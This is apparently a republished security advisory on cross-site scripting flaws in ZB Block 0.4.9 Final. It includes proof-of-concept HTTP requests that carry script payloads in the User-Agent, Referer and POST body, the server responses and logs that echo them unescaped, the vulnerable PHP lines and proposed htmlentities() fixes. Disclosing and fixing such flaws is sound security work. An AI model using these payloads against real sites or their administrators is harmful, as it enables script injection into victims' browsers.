ZB Block version 0.4.9 Final suffers from cross site scripting vulnerabilities in the User-Agent and Referer headers.
c14c01d2f9b5490074a0f43558bc480240ede588e35082f8a3c66d424173a91e--------------------------------------------------------------------------------------------------------------------
Vulnerable Software:
// ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK
// VERSION 0.4.9 Final "Jaguar"
0.4.9_Final
Developed by HTTP://WWW.SPAMBOTSECURITY.COM
--------------------------------------------------------------------------------------------------------------------
Severity: *Low*
--------------------------------------------------------------------------------------------------------------------
Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES)
--------------------------------------------------------------------------------------------------------------------
Founded by: AkaStep
-------------------------------------------------------------------------------------------------------------------
Description:
ZB Block is distributed under the GNU/GPL Version 2 License.
It's main goal:
Act as "Honeypot" on your site and block intrusions.
For more info:
SPAMBOTSECURITY.COM
-------------------------------------------------------------------------------------------------------------------
Vulnerability Desc:
Due "trust" to HTTP_USER_AGENT and HTTP_REFERER
ZB Block is vulnerable to non-persistent cross site scripting vulnerability.
However it also logs attacks so unsanitized thus variables will be writen to killed_logs.txt
which on "future" may act as Persistent Cross Site Scripting Vulnerability against admin.
-------------------------------------------------------------------------------------------------------------------
Proof of Concept:
====================Triggering Attack Against Site which is protected using ZB Block========================
cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script>
cmd> User-Agent: <script>alert("Pwn Using user Agent");</script>
cmd> Host: 192.168.0.15
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
hdr> Content-Length: 3890
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
================= END OF REQUEST ======================================
Responce:(Take a look it doesn't touches HTTP_REFERER and HTTP_USER_AGENT( and it is same as "original" - without any sanitization)
--------------------------------------------------- SNIPPET GOES -------------------------------------------------------
<strong><font color="#0000FF">Record #:</font></strong> 1<br>
<strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br>
<strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br>
<strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br>
<strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br>
<strong><font color="#0000FF">Post:</font></strong> <br>
<strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br>
<strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br>
<strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br>
<strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br>
<strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br>
<br> Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p>
</body>
</html>
--------------------------------------------------- END OF SNIPPET -------------------------------------------------------
Print Screen:
http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png
/*----------------------------------------------VULNERABLE CODE--------------------------------------------------------------*/
//zbblock.php
// LINE NO 455 && 459
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];}
$fromhost=strtolower($fromhost2);
$fromhostsws=preg_replace('/\s+/','',$fromhost);
$fromhostsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$fromhostsws);
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];}
$lcuseragent=strtolower($useragent);
$lcuseragentsws=preg_replace('/\s+/','',$lcuseragent);
$lcuseragentsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$lcuseragentsws);
/*------------------------------------- END OF VULNERABLE CODE -------------------------------------------------------*/
Defaulty this script writes log file:
filename: killed_log.txt
Exist in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt
Which is not readable from HTTP (because access to that area protected using .htaccess (Deny from all)
Ok,lets see it's content after triggering attack:
-----------------------------------------------------------------------------------------------------------------------------------------
# cat -n killed_log.txt|less
1 <?php die(''); ?>
2
3 #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final
4 Host: labmachine.mshome.net
5 IP: 192.168.0.1
6 Score: 6
7 Violation count: 0
8 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
9 Query: id=<ScRiPt>AlErT("Not
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
12 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not
13
14 #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final
15 Host: labmachine.mshome.net
16 IP: 192.168.0.1
17 Score: 6
18 Violation count: 1
19 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
20 Query: id=<script>alert("Is
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>
23 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is
24
------------------------------------------------------------------------------------------------------------------------------------------------
As you can see:
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>
Same as original.In future which may cause problems for site administrator.
Can't because .txt file and protected using .htaccess ? :)
This gives to us a bit advantage to catch site admin and automatically exploitate our XSS attack.
Theris a chance admin will read that file using some "reader script" and admin believes that killed_log.txt is safe)
In ex:
----------------------------------------------------------------------------------------------------------------------------------------------
<?php
echo '<pre>' .
file_get_contents('./vault/killed_log.txt') . '</pre>';
?>
----------------------------------------------------------------------------------------------------------------------------------------------
So, theris a chance to execute our javascript(html) in context of admin's browser.
Fix so simple:
ZB BLOCK Developer(s) should note that HTTP_USER_AGENT AND HTTP_REFERER isn't "trust"-able and may be spoofed
or injected easily.
So htmlentities() or strip_tags() our best friends in this case :)
------------------------------------------------- FIX 1---------------------------------------------------------------------------------------
//zbblock.php
//LINE NO 455
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);}
//LINE NO 459
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);}
// END OF
-----------------------------------------------------------------------------------------------------------------------------------------------
Also here is another non-persistent XSS while detecting POST request intrusion attempt.
--------------------------------------------- POST METHOD--------------------------------------------------------------------------------------
cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php
cmd> Content-Type: application/x-www-form-urlencoded
cmd> Host: 192.168.0.15
cmd> Content-Length: 58
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059.
hdr> Content-Length: 3548
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21
// Take a look our payload is not in urlencoded //
-------------------------------------------------------------------------------------------------------------------------------------------------
Responce:
----------------------- SNIPPET -------------------------------------------------------------------------------------
<strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br>
----------------------- END OF SNIPPET -------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
So why this occurs?
Again we are going to look our code:
------------------------------------------ VULNERABLE CODE -------------------------------------------------------------
//zbblock.php
// Line: no: 856
<strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br>
//
------------------------------------------------------------------------------------------------------------------------
//And if we'll look to up line no: 472
$rawpost=file_get_contents("php://input");
//No sanitization again
// I think
/*--------------------------- SINCE POST DATA content is not logging to killed_logs.txt
and it is only for print to client side we can use on line 855
<strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br>
This also applies to line no: 838
$dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy);
---------------------------------------------------------- EOF --------------------------------------------------------------------------------*/
/AkaStep ^_^
1330959272
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed